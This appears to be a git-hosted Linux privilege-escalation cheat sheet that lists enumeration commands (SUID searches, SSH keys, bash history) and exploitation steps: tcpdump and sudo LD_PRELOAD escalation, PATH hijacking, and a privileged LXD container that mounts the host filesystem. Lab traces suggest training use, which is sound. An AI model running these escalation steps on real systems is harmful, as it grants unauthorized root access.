daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

linux-privesc.md (3661B)


      1 ---
      2 title: "Linux Privilege Escalation"
      3 description: "Linux privesc quick-reference: sudo, SUID/SGID, cron, LD_PRELOAD, LXD, NFS, capabilities and kernel."
      4 category: privilege-escalation
      5 tags: [privilege-escalation, linux, post-exploitation]
      6 tools: [linPEAS, pspy, GTFOBins]
      7 difficulty: intermediate
      8 updated: "2026-08-09"
      9 source: "vault:PrivEsc/Linux PrivEsc Cheat Sheet.md"
     10 ---
     11 
     12 # Linux Privilege Escalation
     13 
     14 A dense command checklist for enumerating and exploiting privilege-escalation paths on Linux. Enumerate first (linPEAS / pspy), then map any finding against GTFOBins.
     15 
     16 ## Enumeration
     17 
     18 | Command | Description |
     19 | --- | --- |
     20 | `ssh htb-student@<target IP>` | SSH to lab target |
     21 | `ps aux \| grep root` | See processes running as root |
     22 | `ps au` | See logged in users |
     23 | `ls /home` | View user home directories |
     24 | `ls -l ~/.ssh` | Check for SSH keys for current user |
     25 | `history` | Check the current user's Bash history |
     26 | `sudo -l` | Can the user run anything as another user? |
     27 | `ls -la /etc/cron.daily` | Check for daily Cron jobs |
     28 | `lsblk` | Check for unmounted file systems/drives |
     29 | `find / -path /proc -prune -o -type d -perm -o+w 2>/dev/null` | Find world-writable directories |
     30 | `find / -path /proc -prune -o -type f -perm -o+w 2>/dev/null` | Find world-writable files |
     31 | `uname -a` | Check the kernel version |
     32 | `cat /etc/lsb-release` | Check the OS version |
     33 | `screen -v` | Check the installed version of `screen` |
     34 | `./pspy64 -pf -i 1000` | View running processes with `pspy` |
     35 | `echo $PATH` | Check the current user's PATH variable contents |
     36 | `find / ! -path "*/proc/*" -iname "*config*" -type f 2>/dev/null` | Search for config files |
     37 | `./lynis audit system` | Perform a system audit with `Lynis` |
     38 
     39 ## Kernel Exploits
     40 
     41 | Command | Description |
     42 | --- | --- |
     43 | `gcc kernel_exploit.c -o kernel_exploit` | Compile an exploit written in C |
     44 
     45 ## SUID / SGID Binaries
     46 
     47 | Command | Description |
     48 | --- | --- |
     49 | `find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null` | Find binaries with the SUID bit set |
     50 | `find / -user root -perm -6000 -exec ls -ldb {} \; 2>/dev/null` | Find binaries with the SETGID bit set |
     51 | `sudo /usr/sbin/tcpdump -ln -i ens192 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root` | Priv esc with `tcpdump` |
     52 
     53 ## PATH Abuse
     54 
     55 | Command | Description |
     56 | --- | --- |
     57 | `echo $PATH` | Check the current user's PATH variable contents |
     58 | `PATH=.:${PATH}` | Add a `.` to the beginning of the current user's PATH |
     59 
     60 ## Shared Library / LD_PRELOAD
     61 
     62 | Command | Description |
     63 | --- | --- |
     64 | `ldd /bin/ls` | View the shared objects required by a binary |
     65 | `sudo LD_PRELOAD=/tmp/root.so /usr/sbin/apache2 restart` | Escalate privileges using `LD_PRELOAD` |
     66 | `readelf -d payroll \| grep PATH` | Check the RUNPATH of a binary |
     67 | `gcc src.c -fPIC -shared -o /development/libshared.so` | Compile a shared library |
     68 
     69 ## LXD / LXC
     70 
     71 | Command | Description |
     72 | --- | --- |
     73 | `lxd init` | Start the LXD initialization process |
     74 | `lxc image import alpine.tar.gz alpine.tar.gz.root --alias alpine` | Import a local image |
     75 | `lxc init alpine r00t -c security.privileged=true` | Start a privileged LXD container |
     76 | `lxc config device add r00t mydev disk source=/ path=/mnt/root recursive=true` | Mount the host file system in a container |
     77 | `lxc start r00t` | Start the container |
     78 
     79 ## NFS
     80 
     81 | Command | Description |
     82 | --- | --- |
     83 | `showmount -e 10.129.2.12` | Show the NFS export list |
     84 | `sudo mount -t nfs 10.129.2.12:/tmp /mnt` | Mount an NFS share locally |
     85 
     86 ## Shared tmux Session
     87 
     88 | Command | Description |
     89 | --- | --- |
     90 | `tmux -S /shareds new -s debugsess` | Create a shared `tmux` session socket |